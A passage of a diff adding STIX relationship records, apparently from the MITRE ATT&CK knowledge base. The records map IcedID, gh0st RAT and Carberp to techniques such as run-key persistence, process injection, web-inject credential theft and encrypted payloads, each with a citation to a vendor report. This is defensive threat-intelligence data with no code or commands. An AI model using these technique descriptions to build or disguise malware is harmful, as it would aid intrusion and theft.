+ "relationship_type": "uses", + "id": "relationship--a6fe230f-9e76-46a5-a235-2990009d8c4a", + "type": "relationship", + "modified": "2020-08-14T14:25:53.816Z", + "created": "2020-07-15T19:02:25.057Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5147ef15-1cae-4707-8ea1-bee8d98b7f1d", + "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", + "external_references": [ + { + "source_name": "IBM IcedID November 2017", + "url": "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "description": "Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020." + } + ], + "description": "[IcedID](https://attack.mitre.org/software/S0483) has established persistence by creating a Registry run key.(Citation: IBM IcedID November 2017)", + "relationship_type": "uses", + "id": "relationship--cabd44af-9804-4f83-98e0-927719057a62", + "type": "relationship", + "modified": "2020-08-14T14:25:53.894Z", + "created": "2020-07-15T19:02:25.074Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5147ef15-1cae-4707-8ea1-bee8d98b7f1d", + "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", + "external_references": [ + { + "source_name": "IBM IcedID November 2017", + "url": "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "description": "Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020." + }, + { + "source_name": "Juniper IcedID June 2020", + "url": "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", + "description": "Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020." + } + ], + "description": "[IcedID](https://attack.mitre.org/software/S0483) has used SSL and TLS in communications with C2.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)", + "relationship_type": "uses", + "id": "relationship--fbf2cca6-d734-49b2-a1a9-6c393b99fd91", + "type": "relationship", + "modified": "2020-07-15T20:33:40.882Z", + "created": "2020-07-15T19:02:25.109Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5147ef15-1cae-4707-8ea1-bee8d98b7f1d", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "external_references": [ + { + "source_name": "IBM IcedID November 2017", + "url": "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "description": "Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020." + }, + { + "source_name": "Juniper IcedID June 2020", + "url": "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", + "description": "Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020." + } + ], + "description": "[IcedID](https://attack.mitre.org/software/S0483) has the ability to download additional modules and a configuration file from C2.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)", + "relationship_type": "uses", + "id": "relationship--a8484e9d-ad08-4d2c-8328-24552dd22f35", + "type": "relationship", + "modified": "2020-07-15T20:10:03.976Z", + "created": "2020-07-15T19:02:25.121Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5147ef15-1cae-4707-8ea1-bee8d98b7f1d", + "target_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", + "external_references": [ + { + "source_name": "IBM IcedID November 2017", + "url": "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "description": "Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020." + } + ], + "description": "[IcedID](https://attack.mitre.org/software/S0483) can query LDAP to identify additional users on the network to infect.(Citation: IBM IcedID November 2017)", + "relationship_type": "uses", + "id": "relationship--94229aa6-c862-48b8-9959-1e1d3c04dd5e", + "type": "relationship", + "modified": "2020-08-14T14:25:54.007Z", + "created": "2020-07-15T19:02:25.123Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5147ef15-1cae-4707-8ea1-bee8d98b7f1d", + "target_ref": "attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47", + "external_references": [ + { + "source_name": "IBM IcedID November 2017", + "url": "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "description": "Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020." + }, + { + "source_name": "Juniper IcedID June 2020", + "url": "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", + "description": "Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020." + } + ], + "description": "[IcedID](https://attack.mitre.org/software/S0483) has used web injection attacks to redirect victims to spoofed sites designed to harvest banking and other credentials. [IcedID](https://attack.mitre.org/software/S0483) can use a self signed TLS certificate in connection with the spoofed site and simultaneously maintains a live connection with the legitimate site to display the correct URL and certificates in the browser.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)", + "relationship_type": "uses", + "id": "relationship--c5e3e18d-124e-4ae2-a95c-9db8f6d53000", + "type": "relationship", + "modified": "2020-08-14T14:25:54.036Z", + "created": "2020-07-15T19:02:25.131Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5147ef15-1cae-4707-8ea1-bee8d98b7f1d", + "target_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", + "external_references": [ + { + "source_name": "IBM IcedID November 2017", + "url": "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "description": "Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020." + } + ], + "description": "[IcedID](https://attack.mitre.org/software/S0483) has the ability to identify Workgroup membership.(Citation: IBM IcedID November 2017)", + "relationship_type": "uses", + "id": "relationship--34a06e23-b81c-45c7-96bc-7e08d31a4a44", + "type": "relationship", + "modified": "2020-07-15T19:06:50.610Z", + "created": "2020-07-15T19:06:50.610Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5147ef15-1cae-4707-8ea1-bee8d98b7f1d", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "external_references": [ + { + "source_name": "IBM IcedID November 2017", + "url": "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "description": "Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020." + } + ], + "description": "[IcedID](https://attack.mitre.org/software/S0483) has the ability to identify the computer name and OS version on a compromised host.(Citation: IBM IcedID November 2017)", + "relationship_type": "uses", + "id": "relationship--f36f0a5d-a2a6-440f-8d6f-3fbdafb07af0", + "type": "relationship", + "modified": "2020-07-15T19:06:50.615Z", + "created": "2020-07-15T19:06:50.615Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5147ef15-1cae-4707-8ea1-bee8d98b7f1d", + "target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055", + "external_references": [ + { + "source_name": "Juniper IcedID June 2020", + "url": "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", + "description": "Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020." + } + ], + "description": "[IcedID](https://attack.mitre.org/software/S0483) has used WMI to execute binaries.(Citation: Juniper IcedID June 2020)", + "relationship_type": "uses", + "id": "relationship--969d588f-7357-4349-b158-2bf78704c1b4", + "type": "relationship", + "modified": "2020-07-15T19:18:56.454Z", + "created": "2020-07-15T19:18:56.454Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5147ef15-1cae-4707-8ea1-bee8d98b7f1d", + "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", + "external_references": [ + { + "source_name": "Juniper IcedID June 2020", + "url": "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", + "description": "Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020." + } + ], + "description": "[IcedID](https://attack.mitre.org/software/S0483) has been executed through Word documents with malicious embedded macros.(Citation: Juniper IcedID June 2020)", + "relationship_type": "uses", + "id": "relationship--7b078d28-1724-474c-8668-a6d5c28ed72b", + "type": "relationship", + "modified": "2020-07-15T19:18:56.457Z", + "created": "2020-07-15T19:18:56.457Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5147ef15-1cae-4707-8ea1-bee8d98b7f1d", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "external_references": [ + { + "source_name": "Juniper IcedID June 2020", + "url": "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", + "description": "Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020." + } + ], + "description": "[IcedID](https://attack.mitre.org/software/S0483) has utilzed encrypted binaries and base64 encoded strings.(Citation: Juniper IcedID June 2020)", + "relationship_type": "uses", + "id": "relationship--83e30b05-5658-4cc3-9bac-500ea852e655", + "type": "relationship", + "modified": "2020-07-15T20:10:03.979Z", + "created": "2020-07-15T19:18:56.449Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5147ef15-1cae-4707-8ea1-bee8d98b7f1d", + "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", + "external_references": [ + { + "source_name": "Juniper IcedID June 2020", + "url": "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", + "description": "Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020." + } + ], + "description": "[IcedID](https://attack.mitre.org/software/S0483) has been delivered via phishing e-mails with malicious attachments.(Citation: Juniper IcedID June 2020)", + "relationship_type": "uses", + "id": "relationship--b7d44225-31cf-4766-b585-debf0ed8d965", + "type": "relationship", + "modified": "2020-07-15T19:18:56.463Z", + "created": "2020-07-15T19:18:56.463Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24", + "target_ref": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", + "external_references": [ + { + "source_name": "Gh0stRAT ATT March 2019", + "url": "https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant", + "description": "Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020." + } + ], + "description": "[gh0st RAT](https://attack.mitre.org/software/S0032)\toperators have used dynamic DNS to mask the true location of their C2 behind rapidly changing IP addresses.(Citation: Gh0stRAT ATT March 2019)", + "relationship_type": "uses", + "id": "relationship--b2876820-3402-45e3-a0af-f85237a23ae6", + "type": "relationship", + "modified": "2020-07-15T19:28:00.659Z", + "created": "2020-07-15T19:28:00.659Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24", + "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", + "external_references": [ + { + "source_name": "Gh0stRAT ATT March 2019", + "url": "https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant", + "description": "Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020." + } + ], + "description": "[gh0st RAT](https://attack.mitre.org/software/S0032)\thas encrypted TCP communications to evade detection.(Citation: Gh0stRAT ATT March 2019)", + "relationship_type": "uses", + "id": "relationship--cc2de45c-a1f3-4085-ac35-dffa8a86e9b3", + "type": "relationship", + "modified": "2020-10-05T15:27:17.456Z", + "created": "2020-07-15T19:28:00.683Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24", + "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "external_references": [ + { + "source_name": "Gh0stRAT ATT March 2019", + "url": "https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant", + "description": "Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020." + } + ], + "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) has used the InterlockedExchange, SeShutdownPrivilege, and ExitWindowsEx Windows API functions.(Citation: Gh0stRAT ATT March 2019)", + "relationship_type": "uses", + "id": "relationship--9966a850-54b2-41f5-83de-51c066085d72", + "type": "relationship", + "modified": "2020-07-15T19:28:00.688Z", + "created": "2020-07-15T19:28:00.688Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24", + "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "external_references": [ + { + "source_name": "Gh0stRAT ATT March 2019", + "url": "https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant", + "description": "Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020." + } + ], + "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) has used an encrypted protocol within TCP segments to communicate with the C2.(Citation: Gh0stRAT ATT March 2019)", + "relationship_type": "uses", + "id": "relationship--8f8adede-8b7a-460d-b852-b52328df178a", + "type": "relationship", + "modified": "2020-10-05T15:27:17.508Z", + "created": "2020-07-15T19:28:00.690Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "external_references": [ + { + "source_name": "Gh0stRAT ATT March 2019", + "url": "https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant", + "description": "Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020." + } + ], + "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) has gathered system architecture, processor, OS configuration, and installed hardware information.(Citation: Gh0stRAT ATT March 2019)", + "relationship_type": "uses", + "id": "relationship--aee29ae1-4544-4fc8-b30b-4717888991ca", + "type": "relationship", + "modified": "2020-07-15T19:28:00.717Z", + "created": "2020-07-15T19:28:00.717Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24", + "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "external_references": [ + { + "source_name": "Gh0stRAT ATT March 2019", + "url": "https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant", + "description": "Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020." + } + ], + "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) has decrypted and loaded the [gh0st RAT](https://attack.mitre.org/software/S0032) DLL into memory, once the initial dropper executable is launched.(Citation: Gh0stRAT ATT March 2019)", + "relationship_type": "uses", + "id": "relationship--8631491d-bda8-4eee-93ec-5f3fc6340c3f", + "type": "relationship", + "modified": "2020-07-15T19:28:00.720Z", + "created": "2020-07-15T19:28:00.720Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24", + "target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896", + "external_references": [ + { + "source_name": "Gh0stRAT ATT March 2019", + "url": "https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant", + "description": "Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020." + } + ], + "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) has checked for the existence of a Service key to determine if it has already been installed on the system.(Citation: Gh0stRAT ATT March 2019)", + "relationship_type": "uses", + "id": "relationship--80d8e746-f0a0-4781-824a-0147dbbee072", + "type": "relationship", + "modified": "2020-07-15T19:28:00.745Z", + "created": "2020-07-15T19:28:00.745Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24", + "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4", + "external_references": [ + { + "source_name": "Gh0stRAT ATT March 2019", + "url": "https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant", + "description": "Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020." + } + ], + "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) has altered the InstallTime subkey.(Citation: Gh0stRAT ATT March 2019)", + "relationship_type": "uses", + "id": "relationship--0f4c2cab-c3ca-4f31-8557-485248b65761", + "type": "relationship", + "modified": "2020-07-15T19:28:00.750Z", + "created": "2020-07-15T19:28:00.750Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24", + "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "external_references": [ + { + "source_name": "Gh0stRAT ATT March 2019", + "url": "https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant", + "description": "Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020." + } + ], + "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) can inject malicious code into process created by the \u201cCommand_Create&Inject\u201d function.(Citation: Gh0stRAT ATT March 2019)", + "relationship_type": "uses", + "id": "relationship--5291c077-dc09-4716-ab9a-d65318794839", + "type": "relationship", + "modified": "2020-07-15T19:28:00.774Z", + "created": "2020-07-15T19:28:00.774Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5147ef15-1cae-4707-8ea1-bee8d98b7f1d", + "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "external_references": [ + { + "source_name": "Juniper IcedID June 2020", + "url": "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", + "description": "Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020." + } + ], + "description": "[IcedID](https://attack.mitre.org/software/S0483) has called ZwWriteVirtualMemory, ZwProtectVirtualMemory, ZwQueueApcThread, and NtResumeThread to inject itself into a remote process.(Citation: Juniper IcedID June 2020)", + "relationship_type": "uses", + "id": "relationship--891f37e3-9c72-4eed-8fcc-8106dc360a97", + "type": "relationship", + "modified": "2020-07-15T20:10:03.852Z", + "created": "2020-07-15T20:10:03.852Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5147ef15-1cae-4707-8ea1-bee8d98b7f1d", + "target_ref": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336", + "external_references": [ + { + "source_name": "Juniper IcedID June 2020", + "url": "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", + "description": "Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020." + } + ], + "description": "[IcedID](https://attack.mitre.org/software/S0483) can inject itself into a suspended msiexec.exe process to send beacons to C2 while appearing as a normal msi application. (Citation: Juniper IcedID June 2020)", + "relationship_type": "uses", + "id": "relationship--24c80905-1afb-43fa-b1c0-e8bf2e7e87e2", + "type": "relationship", + "modified": "2020-08-14T14:25:54.245Z", + "created": "2020-07-15T20:10:03.858Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5147ef15-1cae-4707-8ea1-bee8d98b7f1d", + "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "external_references": [ + { + "source_name": "Juniper IcedID June 2020", + "url": "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", + "description": "Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020." + } + ], + "description": "[IcedID](https://attack.mitre.org/software/S0483) has used obfuscated VBA string expressions.(Citation: Juniper IcedID June 2020)", + "relationship_type": "uses", + "id": "relationship--9968edfb-8501-4954-847d-8f873c78e023", + "type": "relationship", + "modified": "2020-07-15T20:10:03.890Z", + "created": "2020-07-15T20:10:03.890Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5147ef15-1cae-4707-8ea1-bee8d98b7f1d", + "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "external_references": [ + { + "source_name": "Juniper IcedID June 2020", + "url": "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", + "description": "Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020." + } + ], + "description": "[IcedID](https://attack.mitre.org/software/S0483) has created a scheduled task that executes every hour to establish persistence.(Citation: Juniper IcedID June 2020)", + "relationship_type": "uses", + "id": "relationship--499d7aed-5889-4f40-a688-660f976dd112", + "type": "relationship", + "modified": "2020-07-15T20:10:03.919Z", + "created": "2020-07-15T20:10:03.919Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5147ef15-1cae-4707-8ea1-bee8d98b7f1d", + "target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", + "external_references": [ + { + "source_name": "Juniper IcedID June 2020", + "url": "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", + "description": "Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020." + } + ], + "description": "[IcedID](https://attack.mitre.org/software/S0483) has packed and encrypted its loader module.(Citation: Juniper IcedID June 2020)", + "relationship_type": "uses", + "id": "relationship--ee6b93d4-71f1-4d8c-bc2d-3cbb9b30c866", + "type": "relationship", + "modified": "2020-07-15T20:10:03.927Z", + "created": "2020-07-15T20:10:03.927Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5147ef15-1cae-4707-8ea1-bee8d98b7f1d", + "target_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", + "external_references": [ + { + "source_name": "Juniper IcedID June 2020", + "url": "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", + "description": "Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020." + } + ], + "description": "[IcedID](https://attack.mitre.org/software/S0483) has embedded binaries within RC4 encrypted .png files.(Citation: Juniper IcedID June 2020)", + "relationship_type": "uses", + "id": "relationship--8d36ae15-a2af-4c13-86f0-f657afbb4c86", + "type": "relationship", + "modified": "2020-07-15T20:10:03.924Z", + "created": "2020-07-15T20:10:03.924Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "external_references": [ + { + "source_name": "Trusteer Carberp October 2010", + "url": "https://web.archive.org/web/20111004014029/http://www.trusteer.com/sites/default/files/Carberp_Analysis.pdf", + "description": "Trusteer Fraud Prevention Center. (2010, October 7). Carberp Under the Hood of Carberp: Malware & Configuration Analysis. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484) has collected a list of running processes.(Citation: Trusteer Carberp October 2010)", + "relationship_type": "uses", + "id": "relationship--f83167c8-b964-44d2-b370-5f5e86460568", + "type": "relationship", + "modified": "2020-08-03T15:17:31.821Z", + "created": "2020-07-15T20:23:36.324Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "external_references": [ + { + "source_name": "Trusteer Carberp October 2010", + "url": "https://web.archive.org/web/20111004014029/http://www.trusteer.com/sites/default/files/Carberp_Analysis.pdf", + "description": "Trusteer Fraud Prevention Center. (2010, October 7). Carberp Under the Hood of Carberp: Malware & Configuration Analysis. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484) has connected to C2 servers via HTTP.(Citation: Trusteer Carberp October 2010)", + "relationship_type": "uses", + "id": "relationship--c3add97f-09bc-4c16-81ff-116106558487", + "type": "relationship", + "modified": "2020-08-03T15:17:31.879Z", + "created": "2020-07-15T20:23:36.328Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "external_references": [ + { + "source_name": "Trusteer Carberp October 2010", + "url": "https://web.archive.org/web/20111004014029/http://www.trusteer.com/sites/default/files/Carberp_Analysis.pdf", + "description": "Trusteer Fraud Prevention Center. (2010, October 7). Carberp Under the Hood of Carberp: Malware & Configuration Analysis. Retrieved July 